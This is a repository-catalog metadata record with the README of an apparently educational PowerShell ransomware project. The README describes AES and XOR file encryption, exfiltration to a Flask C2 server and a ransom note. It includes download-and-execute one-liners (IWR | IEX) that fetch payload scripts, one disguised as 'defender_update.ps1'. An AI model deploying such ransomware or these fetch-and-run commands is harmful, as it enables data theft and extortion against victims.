{"id":27629286,"url":"https://github.com/0x4f776c/powershell-ransomware","last_synced_at":"2025-04-23T15:16:01.577Z","repository":{"id":286877694,"uuid":"962833610","full_name":"0x4F776C/PowerShell-Ransomware","owner":"0x4F776C","description":"AES-256 and XOR-based PowerShell ransomware with customizability.","archived":false,"fork":false,"pushed_at":"2025-04-08T19:16:27.000Z","size":71182,"stargazers_count":0,"open_issues_count":0,"forks_count":0,"subscribers_count":1,"default_branch":"main","last_synced_at":"2025-04-23T15:15:57.951Z","etag":null,"topics":["command-and-control","powershell","ransomware"],"latest_commit_sha":null,"homepage":"","language":"PowerShell","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/0x4F776C.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2025-04-08T18:36:47.000Z","updated_at":"2025-04-08T19:16:09.000Z","dependencies_parsed_at":"2025-04-08T20:36:50.366Z","dependency_job_id":null,"html_url":"https://github.com/0x4F776C/PowerShell-Ransomware","commit_stats":null,"previous_names":["0x4f776c/powershell-ransomware"],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0x4F776C%2FPowerShell-Ransomware","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0x4F776C%2FPowerShell-Ransomware/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0x4F776C%2FPowerShell-Ransomware/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0x4F776C%2FPowerShell-Ransomware/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/0x4F776C","download_url":"https://codeload.github.com/0x4F776C/PowerShell-Ransomware/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":250457791,"owners_count":21433734,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["command-and-control","powershell","ransomware"],"created_at":"2025-04-23T15:16:00.837Z","updated_at":"2025-04-23T15:16:01.570Z","avatar_url":"https://github.com/0x4F776C.png","language":"PowerShell","funding_links":[],"categories":[],"sub_categories":[],"readme":"\u003c!-- display-subdirectories: false --\u003e\n\n# PowerShell-Ransomware\n\nAES-256 and XOR-based PowerShell ransomware with customizability.\n\n## Purpose\nBoth **0xLock** and **Rox** are meant for educational project demonstrating file encryption with Command-and-Control (C2) server integration. It simulates ransomware-like behavior using AES and XOR encryption, including file exfiltration and C2 communication, for learning purposes only.\n\n⚠️ **Warning**: This project is for educational use only. The encryption methods (AES and XOR) are not secure for production due to simplified key management and inherent weaknesses (especially XOR). Not sure if my target audience cares...\n\n## Description\nThis repository contains:\n- **`heartbeat.ps1`**: A PowerShell script that encrypts files using AES-256, exfiltrates files (\u003c1GB) to a C2 server, and beacons back with results.\n- **`defender_update.ps1`**: A PowerShell script that encrypts files using xor, exfiltrates files to a C2 server, and beacons back with results.\n- **`server.py`**: A Flask-based C2 server that handles payload delivery, file exfiltration, system info, file indexing, and beaconing.\n- **`clean_exfil.sh`**: A bash script to purge all contents in `exfiltrated_files` and `exfiltrated_data` directory.\n\nFiles are encrypted in test directories (`C:\\Temp\\heartbeatDemo` for AES, `C:\\Temp\\roxDemo` for XOR) to avoid affecting real data.\n\n## Usage\n\n### Prerequisites\n- **PowerShell Scripts**: Windows with PowerShell 5.1+.\n- **Flask Server**: Python 3.6+, Flask (`pip install flask`), and network access (default: `10.0.0.128:80`).\n\n### Setup\n\n1. **Clone the Repository**:\n\n```bash\ngit clone https://github.com/0x4F776C/PowerShell-Ransomware.git\ncd PowerShell-Ransomware\n```\n\n2. **Run the Flask Server**:\n\n```bash\npip install flask\npython server.py\n```\n\n- If testing locally, update `$c2Server`` in both scripts to `127.0.0.1:5000`` and run the server with `app.run(host='0.0.0.0', port=5000, debug=True)``.\n\n3. Run the PowerShell Scripts:\n\n- For AES:\n\n```powershell\nIWR -Uri \"http://\u003cserver ip\u003e/files/heartbeat.ps1\" -UseBasicParsing | IEX\n```\n\n- For XOR:\n\n```powershell\nIWR -Uri \"http://\u003cserver ip\u003e/files/defender_update.ps1\" -UseBasicParsing | IEX\n```\n\n- Results: Encrypted files (`.0xlock` for AES, `.rox` for XOR), exfiltrated files in `exfiltrated_files/`, and a ransom note in the test directory.\n\n### Future Plans\n\n- Add more encryption methods (e.g., RSA for key exchange).\n- Improve key management for the AES script (e.g., secure key storage).\n- Enhance the C2 server with a web interface for monitoring.\n- Include more robust error handling and logging.\n- Add unit tests for both scripts and the server.\n\n### License\nThis project is licensed under the MIT License. See the file for details.\nHappy experimenting! 🚀","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2F0x4f776c%2Fpowershell-ransomware","html_url":"https://awesome.ecosyste.ms/projects/github.com%2F0x4f776c%2Fpowershell-ransomware","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2F0x4f776c%2Fpowershell-ransomware/lists"}